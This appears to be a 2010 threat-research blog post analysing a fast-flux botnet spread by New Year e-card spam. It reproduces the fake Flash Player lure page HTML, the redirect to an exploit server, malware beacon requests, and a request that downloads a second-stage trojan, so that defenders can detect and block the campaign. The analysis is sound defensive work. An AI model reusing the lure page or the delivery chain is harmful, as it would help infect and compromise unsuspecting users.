- 01.04.2011: Volunteer Status
- No entries for March 2011.
- 14.02.2011: Andre' DiMino - Resignation from Shadowserver
Thursday, 30 December 2010
New Fast Flux Botnet for the Holidays: Could it be Storm Worm 3.0/Waledac 2.0?
Those of us here at Shadowserver hope you're having a wonderful holiday season and are ready to bring in the new year. We were trying to relax and enjoy relatively quiet times until we noticed a new spam campaign that recently started. At first it looked like your regular old holiday e-card scams that have been around for years. However, upon closer inspection it looks like we could be dealing with the next generation of Storm Worm or Waledac. If you consider Waledac to be Storm Worm 2.0, this looks like it could be version 3.0 or at least Waledac 2.0. There are no real version numbers of course, but we don't have anything else to call it yet. What's it involve you ask? Well here's the list of what we've seen so far:
Let's start with the Spam Campaign. We've seen a multitude of subject lines and bodies. Below you'll find a list of subjects we've seen and an example e-mail message. These are coming from all over the Internet with spoofed sender addresses.
Greeting for you! Greeting you with heartiest New Year wishes Greetings to You Happy New Year greetings e-card is waiting for you Happy New Year greetings for you Happy New Year greetings from your friend Have a happy and colorful New Year! l want to share Greeting with you (Shadowserver note: the first letter is an L) New Year 2011 greetings for you You have a greeting card You have a New Year Greeting! You have received a greetings card You've got a Happy New Year Greeting Card!
The body has been pretty consistent and looks like this:
Charley has created a New Year ecard. To view this page please click here: <URL> The greeting card will be stored for you for 14 days.
There is no pretty HTML or images in the e-mail. Just simple plaintext to a URL either to a legitimate hacked website or to one of the malicious domains.
Screen shot of e-mail to hacked website (Honda Puerto Rico in this case):
Screen shot of e-mail to new malicious domain:
Malicious Websites & Domains
If you visit one of the HTML files hosted on a compromised website, its source will look something like this:
<meta http-equiv='refresh' content='0;url=hxxp://leolati.com' />
This will redirect you to one of the new malicious domains being used by the botnet. These are fast flux domains that will frequently return a new IP address each time they are resolved.
As you can see the A record has a TTL of 0, which essentially instructs name servers not to cache the result. Continually resolving the hostname will return several new IP addresses, just like previously seen with Storm Worm and Waledac. The example below shows what happens if you resolve the domain 4 times in 2 seconds:
We have been investigating these new domains from e-mail messages, passive DNS, and other sources and have found the following domains so far to be part of this new botnet:
We also found what appears to be a different but closely linked domain that should likely be blocked or monitored for as well:
Malware & Exploits
The whole point of this botnet is to install malware onto systems of unsuspected visitors. It appears to do this in two ways. The first is through social engineering, by tricking the visitor into installing what is fake flash player. The screen shot below shows what is presented when visitors follow a link sent out in the Spam campaign.
The link goes right to install_flash_player.exe. The visitor has 5 seconds to click this link before the page refreshes to an exploit site in the page source. The source of the website looks like this:
<html> <head> <title>Oops, this page requires Flash.</title> <meta http-equiv="Refresh" content="5; url=hxxp://staticweb.co.cc/user/index.php?bid=165&rnd=enabled&offset=1&search=temp123&pool=on"> </head> <body bgcolor="white" text="black"> <br> <center>Can't view this greeting? <a href="install_flash_player.exe" target="_blank">Download Flash Player!</a></center> </body> </html>
If the user downloads and install "install_flash_player.exe", the system will immediately begin connecting to different IP addresses over port 80. The malware will make GET requests like the one seen below.
GET /fOnoxXpVU2wPFUMq.htm HTTP/1.1 Host: 126.96.36.199 Content-Length: 306 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
The requests do have Content-Length fields and include encoded data after the bogus Internet Explorer 8.0 User-Agent. As you may have noticed, this is a GET request with data contained where one would normally find payload for a POST request.
We have observed several different domains used for this URL, all of which have been under the free to register under .co.cc domain. Each of these domains also appears to be hosted on a single Ukranian IP address at 188.8.131.52. We would recommend blocking access to this IP address. These sites appear to fire a few different exploits at the user and will make a GET request to /get/exe.php?x=<exploit tag>, where <exploit tag> is which exploit was successful. The server will respond with the executable and it will write itself as knockout.exe in the user's Temp directory.
After that it does all kinds of beaconing and connection to other unrelated malware websites. Of specific note and interest are two other things it does.
The knockout.exe malware uses the User-Agent Opera/9.80 Pesto/2.2.15 on multiple occasions. One of the first things it does is make the following request to adobe.com:
POST /geo/productid.php HTTP/1.1 Host: adobe.com User-Agent: Opera/9.80 Pesto/2.2.15 Content-Type: application/x-www-form-urlencoded Content-Length: 20 id=_6_244_1009707083
The next thing it does is attempt to install the new Storm Worm 3.0 trojan onto the system by making the following request to darlev.com:
GET /flash2.exe HTTP/1.0 Host: darlev.com
The last successful grab of install_flash_player.exe that we got had the following details:
Filename: install_flash_player.exe File size: 485888 bytes MD5 hash: 58e718e9b9c76330154d4f693b50d50e SHA-1 hash: 50add894f5ccc6bbbf0a00b01952605e1256f990 SHA-256 hash: a7f431309ef5fbe37516153ffd35f1b3475af91f57d9543b724ca53139cd8cae ssdeep: 12288:FLc4mNmApKRkvpAbFl6GAC9f8Qrv4uNNbloFg+9l:FzNkvE/8C9UQrv4uTblRql
Detecting this activity is not too difficult. The first thing you can start with is the domain names above and the malicious IP we listed related to the exploit website. We tested a Snort signature that we found to be fairly reliable at detecting the new beaconing activity. The static User-Agent string, Content-Length field with a GET request, and the beginning of the payload make for fairly easy detection with the below signature.
The new Storm Worm 3.0 network has proven to be pretty unstable. The botnet has been repeatedly returning 503 Service Unavailable for most requests throughout the day. This includes both bot beaconing and requests for the fake greeting card website. We've only been able to successfully download the malware from the network a few times today. We have also observed entire network being intermittently be offline to include fast flux DNS resolution.
We have not done any analysis to see if there are actually any pieces of the code that were directly taken or updated from the Storm Worm or Waledac code. However, whether or not the code is the same or not, this appears to be the next generation of Storm Worm and Waledac. We are just saying it could be Storm Worm 3.0, at least until someone gives it a better name.
Also, it's also worth noting that almost 2 years ago to the day, we posted a blog about the real emergence of Waledac. If you take a look at the screen shot of the e-mail that was sent out in that post, you will see it's very similar to the ones posted above. Additionally, the URL format down to the "?cardid=" is the same as well. If this isn't Storm Worm 3.0 it at least looks very close to Waledac 2.0.
=>Posted December 30, 2010, at 11:28 GMT by Steven Adair